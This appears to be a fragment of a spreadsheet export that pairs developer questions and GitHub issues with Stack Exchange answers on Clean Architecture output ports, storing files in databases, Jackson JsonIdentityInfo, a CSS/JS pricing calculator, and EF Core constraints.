&lt;p&gt;My table description:
&lt;a href="https://i.sstatic.net/26XjtfeM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/26XjtfeM.png" alt="psql table description" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Using the latest pgAdmin and postgres version 16.2&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C908</t>
  </si>
  <si>
    <t>How does the control flow relate to the "Clean Architecture" control flow?
Hi @thombergs,
I'm trying to understand your version of flow of control.
It seems that you're advocating for a controller-&gt;usecase-&gt;controller-&gt;web sequence of control flow.
I'm struggling to understand your concept of the output port - it seems to refer to it as being a persistence boundary interface, that is not what my understanding of clean architecture by Uncle Bob is saying.
When Uncle Bob talks about output port he is referring to a Presenter concept, not persistence.
Also, from the flow of control diagram we see that the control is passed from the controller -&gt; usecase -&gt; presenter where the controller is the input port and the presenter is the output.
https://softwareengineering.stackexchange.com/questions/357052/clean-architecture-use-case-containing-the-presenter-or-returning-data</t>
  </si>
  <si>
    <t>The Clean Architecture suggests to let a use case interactor call the actual implementation of the presenter (which is injected, following the DIP) to handle the response/display. However, I see people implementing this architecture, returning the output data from the interactor, and then let
the controller
(in the adapter layer) decide how to handle it.
That's certainly not
Clean
,
Onion
, or
Hexagonal
Architecture. That is
this
:
Not that
MVC
has to be done that way
You can use many different ways to communicate between modules and call it MVC
. Telling me something uses MVC doesn't really tell me how the components communicate. That isn't standardized. All it tells me is that there are at least three components focused on their three responsibilities.
Some of those ways have been given
different names
:
And every one of those can justifiably be called MVC.
Anyway, none of those really capture what the buzzword architectures (Clean, Onion, and Hex) are all asking you to do.
Add the data structures being flung around (and flip it upside down for some reason) and
you get
:
One thing that should be clear here is that the response model does not go marching through the controller.
If you are eagle eye'd, you might have noticed that only the buzzword architectures completely avoid
circular dependencies
. That means the impact of a code change won't spread by cycling through components. The change will stop when it hits code that doesn't care about it.
Wonder if they turned it upside down so that the flow of control would go through clockwise. More on that, and these "white" arrow heads, later.
Is the second solution leaking application responsibilities out of the application layer, in addition to not clearly defining input and output ports to the interactor?
Since communication from Controller to Presenter is meant to go through the application "layer" then yes making the Controller do part of the Presenters job is likely a leak. This is my chief criticism of
VIPER architecture
.
Why separating these is so important could probably be best understood by studying
Command Query Responsibility Segregation
.
#Input and output ports
Considering the Clean Architecture definition, and especially the little flow diagram describing relationships between a controller, a use case interactor, and a presenter, I'm not sure if I correctly understand what the "Use Case Output Port" should be.
It's the API that you send output through, for this particular use case.  It's no more than that. The interactor for this use case doesn't need to know, nor want to know, if output is going to a GUI, a CLI, a log, or an audio speaker. All the interactor needs to know is the very simplest API possible that will let it report the results of it's work.
Clean architecture, like hexagonal architecture, distinguishes between primary ports (methods) and secondary ports (interfaces to be implemented by adapters). Following the communication flow, I expect the "Use Case Input Port" to be a primary port (thus, just a method), and the "Use Case Output Port" an interface to be implemented, perhaps a constructor argument taking the actual adapter, so that the interactor can use it.
The reason the output port is different from the input port is that it must not be OWNED by the layer that it abstracts. That is, the layer that it abstracts must not be allowed to dictate changes to it. Only the application layer and it's author should decide that the output port can change.
This is in contrast to the input port which is owned by the layer it abstracts. Only the application layer author should decide if it's input port should change.
Following these rules preserves the idea that the application layer, or any inner layer, does not know anything at all about the outer layers.
#On the interactor calling the presenter
The previous interpretation seems to be confirmed by the aforementioned diagram itself, where the relation between the controller and the input port is represented by a solid arrow with a "sharp" head (UML for "association", meaning "has a", where the controller "has a" use case), while the relation between the presenter and the output port is represented by a solid arrow with a "white" head (UML for "inheritance", which is not the one for "implementation", but probably that's the meaning anyway).
The important thing about that "white" arrow is that it lets you do this:
You can let the flow of control go in the opposite direction of dependency! That means the inner layer doesn't have to know about the outer layer and yet you can dive into the inner layer and come back out!
Doing that has nothing to do with using the "interface" keyword. You could do this with an abstract class. Heck you could do it with a (ick) concrete class so long as it can be extended.  It's simply nice to do it with something that focuses only on defining the API that Presenter must implement. The open arrow is only asking for polymorphism. What kind is up to you.
Why reversing the direction of that dependency is so important can be learned by studying the
Dependency Inversion Principle
. I mapped that principle onto these diagrams
here
.
#On the interactor returning data
However, my problem with this approach is that the use case must take care of the presentation itself. Now, I see that the purpose of the Presenter interface is to be abstract enough to represent several different types of presenters (GUI, Web, CLI, etc.), and that it really just means "output", which is something a use case might very well have, but still I'm not totally confident with it.
No that's really it. The point of making sure the inner layers don't know about the outer layers is that we can remove, replace, or refactor the outer layers confident that doing so wont break anything in the inner layers. What they don't know about won't hurt them. If we can do that we can change the outer ones to whatever we want.
Now, looking around the Web for applications of the clean architecture, I seem to only find people interpreting the output port as a method returning some DTO. This would be something like:
Repository repository = new Repository();
UseCase useCase = new UseCase(repository);
Data data = useCase.getData();
Presenter presenter = new Presenter();
presenter.present(data);
// I'm omitting the changes to the classes, which are fairly obvious
This is attractive because we're moving the responsibility of "calling" the presentation out of the use case, so the use case doesn't concern itself with knowing what to do with the data anymore, rather just with providing the data. Also, in this case we're still not breaking the dependency rule, because the use case still doesn't know anything about the outer layer.
The problem here is now whatever knows how to ask for the data has to also be the thing that accepts the data. Before the Controller could call the Usecase Interactor blissfully unaware of what the Response Model would look like, where it should go, and, heh, how to present it.
Again, please study
Command Query Responsibility Segregation
to see why that's important.
However, the use case doesn't control the moment when the actual presentation is performed anymore (which may be useful, for example to do additional stuff at that point, like logging, or to abort it altogether if necessary). Also, notice that we lost the Use Case Input Port, because now the controller is only using the getData() method (which is our new output port). Furthermore, it looks to me that we're breaking the "tell, don't ask" principle here, because we're asking the interactor for some data to do something with it, rather than telling it to do the actual thing in the first place.
Yes! Telling, not asking, will help keep this object oriented rather than procedural.
#To the point
So, is any of these two alternatives the "correct" interpretation of the Use Case Output Port according to the Clean Architecture? Are they both viable?
Anything that works is viable. But I wouldn't say that the second option you presented faithfully follows Clean Architecture. It might be something that works. But it's not what Clean Architecture asks for.</t>
  </si>
  <si>
    <t xml:space="preserve">Do you know any blueprints for organizing a WCF application in a way similar to Service Factory?
The problem is that although Service Factory is well organized, my application is a medium-sized one and it would be an overkill to use the factory - some of the sub-projects that the factory creates for me, I wouldn't ever use.
So what are the common models/architectures/blueprints/patterns for organizing the structure of a WCF application for a mid-sized project?
Thank you.
</t>
  </si>
  <si>
    <t>C909</t>
  </si>
  <si>
    <t>Is your feature request related to a problem? Please describe.
No way to add/update icon of a project
Describe the solution you'd like
The backend needs a way to save a project icon so the frontend can add this feature. We could save the icons in base64 or something similar. Need to do some research as to how to save these and future icons and how to transfer them using our API.
Additional context
The solution that you propose and implement should keep in mind future icons like the ones from a user's avatar.
The way to go is without a doubt storing the images on the filesystem and NOT in the database. See the following StackOverflow post for more elaboration: https://softwareengineering.stackexchange.com/questions/150669/is-it-a-bad-practice-to-store-large-files-10-mb-in-a-database.
A separate endpoint should be implemented for uploading images. I would recommend keeping track of all images/files in the db, containing a unique ID for each image and rename each uploaded file to match the unique id.</t>
  </si>
  <si>
    <t>Reasons in favor of storing files in the database:
ACID consistency including a rollback of an update which is complicated when the files are stored outside the database. This isn't to be glossed over lightly. Having the files and database in sync and able to participate in transactions can be very useful.
Files go with the database and cannot be orphaned from it.
Backups automatically include the file binaries.
Reason against storing files in the database:
The size of a binary file differs amongst databases. On SQL Server, when not using the FILESTREAM object, for example, it is 2 GB. If users need to store files larger (like say a movie), you have to jump through hoops to make that magic happen.
Increases the size of the database. One general concept you should take to heart:
The level of knowledge required to maintain a database goes up in proportion to the size of the database.
I.e., large databases are more complicated to maintain than small databases. Storing the files in the database can make the database much larger. Even if say a daily full backup would have sufficed, with a larger database size, you may no longer be able to do that. You may have to consider putting the files on a different file group (if the database supports that), tweak the backups to separate the backup of the data from the backup of the files etc. None of these things are impossible to learn, but do add complexity to maintenance which means cost to the business. Larger databases also consume more memory as they try to stuff as much data into memory as possible.
Portability can be a concern if you use system specific features like SQL Server's
FILESTREAM
object and need to migrate to a different database system.
The code that writes the files to the database can be a problem. One company for whom I consulted not so many moons ago at some point connected a Microsoft Access frontend to their database server and used Access' ability to upload "anything" using its Ole Object control. Later they changed to use a different control which still relied on Ole. Much later someone changed the interface to store the raw binary. Extracting those Ole Object's was a new level of hell. When you store files on the file system, there isn't an additional layer involved to wrap/tweak/alter the source file.
It is more complicated to serve up the files to a website. In order to do it with binary columns, you have to write a handler to stream the file binary from the database. You can also do this even if you store file paths but you don't
have
to do this. Again, adding a handler is not impossible but adds complexity and is another point of failure.
You cannot take advantage of cloud storage. Suppose one day you want to store your files in an Amazon S3 bucket. If what you store in the database are file paths, you are afforded the ability to change those to paths at S3. As far as I'm aware, that's not possible in any scenario with any DBMS.
IMO, deeming the storage of files in the database or not as "bad" requires more information about the circumstances and requirements. Are the size and/or number of files always going to be small? Are there no plans to use cloud storage? Will the files be served up on a website or a binary executable like a Windows application?
In general, my experience has found that storing paths is less expensive to the business even accounting for the lack of ACID and the possibility of orphans. However, that does not mean that the internet is not legion with stories of lack of ACID control going wrong with file storage but it does mean that in general that solution is easier to build, understand and maintain.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to create an advanced pricing calculator showcase for my client's website.&lt;/p&gt;
&lt;p&gt;Here is what i actually need;&lt;/p&gt;
&lt;p&gt;I'will have 3 different price and value changer;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Employee&lt;/li&gt;
&lt;li&gt;Office Number&lt;/li&gt;
&lt;li&gt;Benefits&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As you can see on the image, those 3 price/value changers will do change 4 different values on the right depends on the left side value chances.&lt;/p&gt;
&lt;p&gt;When the values higher up or selected any benefits; The &amp;quot;with Ozo&amp;quot; background will be filled like %3 but the &amp;quot;without Ozo&amp;quot; background will be filled like 13% (I'm using :before element for the background filling). Also the prices of both blocks will be increase but the &amp;quot;without Ozo&amp;quot; will be increased %15 more than the &amp;quot;with Ozo&amp;quot;. On the other hand when the people number every 15 will add 1 point &amp;quot;HR/Finance employees involved&amp;quot; and 1.5 hour to &amp;quot;hours spent per month&amp;quot; sections.&lt;/p&gt;
&lt;p&gt;For the &amp;quot;What benefits do you offer?&amp;quot; tags each will increase only the &amp;quot;without Ozo&amp;quot; part by adding %10 more to the current price.&lt;/p&gt;
&lt;p&gt;I know i designed something crazy to complete for my design but now i'm unable to get calculated.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/5oNaRdHO.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/5oNaRdHO.png" alt="Advanced Price Calculator" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here is what i did so far;&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;const costRanges = document.querySelectorAll('.cost_item input');
function handleUpdate() {
    const suffix = this.dataset.sizing || '' ;
    var rangeType = this.value+suffix;
    document.documentElement.style.setProperty(`--${this.name}` , rangeType );
}
costRanges.forEach(input =&amp;gt; {
    input.addEventListener('change' , handleUpdate);
});
costRanges.forEach(input =&amp;gt; {
    input.addEventListener('mousemove' , handleUpdate);
});
(function() {
    const rangeEmployee = document.querySelector('input[type="range"]#employee');
    const rangeCountry = document.querySelector('input[type="range"]#country');
    const rangeEmployeeValue = function(){
        const newValue = rangeEmployee.value;
        const target = document.querySelector('.wOzoValue');
        target.innerHTML = newValue;
    }
    const rangeCountryValue = function(){
        const newValue = rangeCountry.value;
        const target = document.querySelector('.woOzoValue');
        target.innerHTML = newValue;
    }
    rangeEmployee.addEventListener("input", rangeEmployeeValue);
    rangeCountry.addEventListener("input", rangeCountryValue);
})();&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-css lang-css prettyprint-override"&gt;&lt;code&gt;.page_section[data-theme="cost-calculator"] .cost-container {
    background-color: rgba(9, 17, 12, 0.8);
    border-radius: 32px;
    padding: 5rem 3rem;
    position: relative
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-container {
        padding: 3rem 2rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-container:before, .page_section[data-theme="cost-calculator"] .cost-container:after {
    content: "";
    position: absolute;
    left: 0;
    width: 100%
}
.page_section[data-theme="cost-calculator"] .cost-container:before {
    top: 0;
    height: 100%;
    background: #2d4731;
    background: linear-gradient(171deg, rgba(45, 71, 49, 0.9) 0%, rgba(56, 126, 124, 0) 100%);
    border-radius: 32px
}
.page_section[data-theme="cost-calculator"] .cost-container:after {
    background-image: url("/views/web/_images/_Home/calc_bg.png");
    background-position: bottom center;
    background-size: 100%;
    background-repeat: no-repeat;
    height: 290px;
    bottom: 0
}
.page_section[data-theme="cost-calculator"] header {
    position: relative
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] header p {
        font-size: 14px;
        font-size: 0.875rem;
        line-height: 18px;
        line-height: 1.125rem
    }
    .page_section[data-theme="cost-calculator"] header p br {
        display: none
    }
}
.page_section[data-theme="cost-calculator"] .label {
    color: var(--fill-primary-inverted);
    background-color: hsla(var(--fill-primary-inverted-opacity-h), var(--fill-primary-inverted-opacity-s), var(--fill-primary-inverted-opacity-l), 0.2);
    border-color: hsla(var(--fill-primary-inverted-opacity-h), var(--fill-primary-inverted-opacity-s), var(--fill-primary-inverted-opacity-l), 0.2)
}
.page_section[data-theme="cost-calculator"] h2, .page_section[data-theme="cost-calculator"] h3, .page_section[data-theme="cost-calculator"] h4, .page_section[data-theme="cost-calculator"] p {
    color: var(--fill-primary-inverted)
}
.page_section[data-theme="cost-calculator"] .cost-calculate {
    position: relative;
    margin: 0 auto;
    width: 100%;
    max-width: 1080px
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Wrap {
    display: flex;
    flex-flow: row wrap;
    justify-content: center;
    gap: 10rem;
    padding: 8rem 0
}
@media (max-width: 1199px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Wrap {
        gap: 6rem;
        padding: 6rem 0
    }
}
@media (max-width: 1023px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Wrap {
        flex-direction: column;
        gap: 4rem;
        padding: 5rem 0 2rem
    }
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Wrap {
        gap: 2rem;
        padding: 3rem 0 2rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Left {
    display: inline-flex;
    flex-flow: column wrap;
    justify-content: flex-start
}
@media (max-width: 1023px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Left {
        flex-direction: row;
        justify-content: space-between;
        align-items: baseline;
        gap: 3rem
    }
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Left {
        gap: 1.5rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Left .cost_item strong {
    display: block;
    margin-bottom: .5rem;
    color: var(--fill-primary-inverted);
    font-size: 18px;
    font-size: 1.125rem;
    line-height: 23px;
    line-height: 1.4375rem;
    font-family: "Mark Pro Medium", sans-serif
}
@media (max-width: 1023px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Left .cost_item strong {
        font-size: 16px;
        font-size: 1rem;
        line-height: 21px;
        line-height: 1.3125rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Left .cost_item + .cost_item {
    margin-top: 5rem
}
@media (max-width: 1023px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Left .cost_item + .cost_item {
        margin-top: 0
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right {
    flex: 1
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks {
    display: inline-flex;
    flex-flow: row wrap;
    gap: 2rem;
    width: 100%
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks {
        flex-direction: column
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item {
    border-radius: 24px;
    flex: 1;
    padding: 2rem 2.5rem;
    display: inline-flex;
    flex-flow: column wrap;
    justify-content: space-between;
    overflow: hidden;
    gap: 3rem;
    position: relative
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item {
        gap: 2rem;
        padding: 1.5rem 2rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:before, .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:after {
    position: absolute;
    bottom: 0;
    left: 0;
    width: 100%;
    content: "";
    border-radius: 0 0 24px 24px
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:nth-child(1) {
    background-color: hsla(var(--fill-button-opacity-h), var(--fill-button-opacity-s), var(--fill-button-opacity-l), 0.85)
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:nth-child(1):before {
    background-color: rgba(97, 146, 115, 0.9);
    height: var(--wHeight)
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:nth-child(2) {
    background-color: #1D2A22
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item:nth-child(2):before {
    background-color: rgba(58, 83, 67, 0.5);
    height: var(--woHeight)
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top, .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom {
    position: relative
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top {
    display: inline-flex;
    flex-flow: column wrap;
    gap: .75rem
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top h3 {
    font-family: "Mark Pro", sans-serif;
    font-size: 17px;
    font-size: 1.0625rem;
    line-height: 21px;
    line-height: 1.3125rem;
    opacity: .75
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top h3 {
        font-size: 16px;
        font-size: 1rem;
        line-height: 20px;
        line-height: 1.25rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price {
    display: inline-flex;
    flex-flow: row wrap;
    align-items: baseline;
    color: var(--fill-primary-inverted);
    padding-top: .5rem
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price span {
    font-size: 20px;
    font-size: 1.25rem;
    line-height: 20px;
    line-height: 1.25rem
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price span {
        font-size: 19px;
        font-size: 1.1875rem;
        line-height: 20px;
        line-height: 1.25rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price div {
    flex: 1;
    margin-left: .5rem;
    display: inline-flex;
    flex-flow: row wrap;
    gap: .5rem
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price div strong {
    font-size: 32px;
    font-size: 2rem;
    line-height: 20px;
    line-height: 1.25rem;
    font-family: "Mark Pro Medium", sans-serif
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price div strong {
        font-size: 30px;
        font-size: 1.875rem;
        line-height: 20px;
        line-height: 1.25rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price div sub {
    opacity: .50;
    font-size: 16px;
    font-size: 1rem;
    line-height: 20px;
    line-height: 1.25rem
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .top .price div sub {
        font-size: 15px;
        font-size: 0.9375rem;
        line-height: 18px;
        line-height: 1.125rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom {
    flex: 1;
    align-content: flex-end
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div {
    color: var(--fill-primary-inverted)
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div strong {
    font-size: 20px;
    font-size: 1.25rem;
    line-height: 25px;
    line-height: 1.5625rem;
    font-family: "Mark Pro Medium", sans-serif
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div strong {
        font-size: 19px;
        font-size: 1.1875rem;
        line-height: 23px;
        line-height: 1.4375rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div p {
    font-size: 14px;
    font-size: 0.875rem;
    line-height: 20px;
    line-height: 1.25rem;
    display: block;
    opacity: .75;
    max-width: 75%
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div p {
        font-size: 13px;
        font-size: 0.8125rem;
        line-height: 18px;
        line-height: 1.125rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div + div {
    margin-top: 3rem
}
@media (max-width: 767px) {
    .page_section[data-theme="cost-calculator"] .cost-calculate-Right .cost-blocks .cost-block-item .bottom div + div {
        margin-top: 2.5rem
    }
}
.page_section[data-theme="cost-calculator"] .cost-calculate-Right .more-info {
    margin-top: 2rem;
    font-size: 14px;
    font-size: 0.875rem;
    line-height: 20px;
    line-height: 1.25rem;
    opacity: .5
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;section class="page_section" data-theme="cost-calculator"&amp;gt;
    &amp;lt;div class="container"&amp;gt;
        &amp;lt;div class="cost-container"&amp;gt;
            &amp;lt;header&amp;gt;
                &amp;lt;div class="label white"&amp;gt;&amp;lt;span&amp;gt;Cost Calculator&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
                &amp;lt;h2&amp;gt;See how much you can save with Ozo&amp;lt;/h2&amp;gt;
            &amp;lt;/header&amp;gt;
            &amp;lt;div class="cost-calculate"&amp;gt;
                &amp;lt;div class="cost-calculate-Wrap"&amp;gt;
                    &amp;lt;div class="cost-calculate-Left"&amp;gt;
                        &amp;lt;div class="cost_item"&amp;gt;
                            &amp;lt;strong&amp;gt;How many employees?&amp;lt;/strong&amp;gt;
                            &amp;lt;input type="range" name="wHeight" id="employee" min="0" max="100" value="5" data-sizing="%" aria-label="Number of Employees"&amp;gt;
                        &amp;lt;/div&amp;gt;
                        &amp;lt;div class="cost_item"&amp;gt;
                            &amp;lt;strong&amp;gt;In how many countries?&amp;lt;/strong&amp;gt;
                            &amp;lt;input type="range" name="woHeight" id="country" min="0" max="100" value="27" data-sizing="%" aria-label="How many countries?"&amp;gt;
                        &amp;lt;/div&amp;gt;
                        &amp;lt;div class="cost_item"&amp;gt;
                            &amp;lt;strong&amp;gt;What benefits do you offer?&amp;lt;/strong&amp;gt;
                            &amp;lt;div class="cost_tags"&amp;gt;
                                &amp;lt;button class="cost-tag-item" type="button" name="cost-tag"&amp;gt;&amp;lt;span&amp;gt;Health Insurance&amp;lt;/span&amp;gt;&amp;lt;/button&amp;gt;
                                &amp;lt;button class="cost-tag-item" type="button" name="cost-tag"&amp;gt;&amp;lt;span&amp;gt;Retirement&amp;lt;/span&amp;gt;&amp;lt;/button&amp;gt;
                            &amp;lt;/div&amp;gt;
                        &amp;lt;/div&amp;gt;
                    &amp;lt;/div&amp;gt;
                    &amp;lt;div class="cost-calculate-Right"&amp;gt;
                        &amp;lt;div class="cost-blocks"&amp;gt;
                            &amp;lt;div class="cost-block-item" id="with-ozo"&amp;gt;
                                &amp;lt;div class="top"&amp;gt;
                                    &amp;lt;h3&amp;gt;with Ozo&amp;lt;/h3&amp;gt;
                                    &amp;lt;div class="price"&amp;gt;
                                        &amp;lt;span&amp;gt;$&amp;lt;/span&amp;gt;
                                        &amp;lt;div&amp;gt;
                                            &amp;lt;strong class="wOzoValue"&amp;gt;2714&amp;lt;/strong&amp;gt;
                                            &amp;lt;sub&amp;gt;/month&amp;lt;/sub&amp;gt;
                                        &amp;lt;/div&amp;gt;
                                    &amp;lt;/div&amp;gt;
                                &amp;lt;/div&amp;gt;
                                &amp;lt;div class="bottom"&amp;gt;
                                    &amp;lt;div&amp;gt;
                                        &amp;lt;p&amp;gt;Cost of service&amp;lt;/p&amp;gt;
                                    &amp;lt;/div&amp;gt;
                                &amp;lt;/div&amp;gt;
                            &amp;lt;/div&amp;gt;
                            &amp;lt;div class="cost-block-item" id="without-ozo"&amp;gt;
                                &amp;lt;div class="top"&amp;gt;
                                    &amp;lt;h3&amp;gt;without Ozo&amp;lt;/h3&amp;gt;
                                    &amp;lt;div class="price"&amp;gt;
                                        &amp;lt;span&amp;gt;$&amp;lt;/span&amp;gt;
                                        &amp;lt;div&amp;gt;
                                            &amp;lt;strong class="woOzoValue"&amp;gt;11787&amp;lt;/strong&amp;gt;
                                            &amp;lt;sub&amp;gt;/month&amp;lt;/sub&amp;gt;
                                        &amp;lt;/div&amp;gt;
                                    &amp;lt;/div&amp;gt;
                                &amp;lt;/div&amp;gt;
                                &amp;lt;div class="bottom"&amp;gt;
                                    &amp;lt;div&amp;gt;
                                        &amp;lt;strong id="cost-employees"&amp;gt;3&amp;lt;/strong&amp;gt;
                                        &amp;lt;p&amp;gt;HR/Finance employees involved&amp;lt;/p&amp;gt;
                                    &amp;lt;/div&amp;gt;
                                    &amp;lt;div&amp;gt;
                                        &amp;lt;strong id="cost-hours"&amp;gt;3.70&amp;lt;/strong&amp;gt;
                                        &amp;lt;p&amp;gt;hours spent per month administering&amp;lt;/p&amp;gt;
                                    &amp;lt;/div&amp;gt;
                                &amp;lt;/div&amp;gt;
                            &amp;lt;/div&amp;gt;
                        &amp;lt;/div&amp;gt;
                        &amp;lt;p class="more-info"&amp;gt;* Estimated figures based on avarage salary, hours per month spent on admin and broker fees.&amp;lt;/p&amp;gt;
                    &amp;lt;/div&amp;gt;
                &amp;lt;/div&amp;gt;
            &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/section&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C91</t>
  </si>
  <si>
    <t>Remove JsonIdentityInfo for Evidence model
The annotation removes the duplicate model and keeps the id instead https://stackoverflow.com/questions/27109953/jackson-with-spring-mvc-duplicate-nested-objects-not-deserializing
The original design is for drug model. The evidence should not be included.</t>
  </si>
  <si>
    <t>This is how jackson designed JsonIdentityInfo annotation logic.
* Annotation used for indicating that values of annotated type
 * or property should be serializing so that instances either
 * contain additional object identifier (in addition actual object
 * properties), or as a reference that consists of an object id
 * that refers to a full serialization. In practice this is done
 * by serializing the first instance as full object and object
 * identity, and other references to the object as reference values.
Jackson will run the full serialization first time and only id will be serialized when it find that object second time.
So, there is two ways how you can fix it:
1) you can simple remove the @JsonIdentityInfo annotation and Jackson will serialize object as you expected but it will remove the @id field from the response. This is probably fine because you still will have 'id' property.
2) I feel like you can simply restructure your objects and delete some references. I would say it is good to do these changes anyway. First of all you can delete reference to the State from UserLocation. I would say that it is not necessary to have the State in userLocation class because of the State is attached to the City. 
By doing this you will access State from the City and your problem is solved.
Also I would delete the reference to the list of userLocations from the City class as well as from State class.
It will look like:
UserLocation has City and doesn't have State.
City has State and doesn't have userLocations
State doesn't have userLocations as well as cities.
Hope this helps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP.NET Core web application written in C# that utilizes the Table-Per-Concrete-Type (TPC) strategy in its database structure.&lt;/p&gt;
&lt;p&gt;For simplicity, let's say that my application solely has 3 tables: A, B, and C.&lt;/p&gt;
&lt;p&gt;Regarding Table A, it has two columns (C1 and C2), plus a unique identifier column (&lt;code&gt;Id&lt;/code&gt;). C1 is a nullable DateOnly column; C2 is a non-nullable DateOnly column.&lt;/p&gt;
&lt;p&gt;Tables B and C have columns not relevant to this question; thus are omitted from the discussion.&lt;/p&gt;
&lt;p&gt;It is worth mentioning that table A is mapped to a base reference type named &amp;quot;Class_A&amp;quot;. Tables B and C are mapped to classes &amp;quot;Class_B&amp;quot; and &amp;quot;Class_C&amp;quot;, respectively. Finally, Class_B and Class_C are direct descendants of Class_A.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Constraint&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;One of my business cases implies a database constraint over Table A. Specifically, column C1 must be greater than C2 when C1 is not null.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Given the above context, how could one implement a constraint over Table_A using fluent API during modelBuilding? This constraint should be directly applicable and inheritable by its descendant tables.&lt;/p&gt;
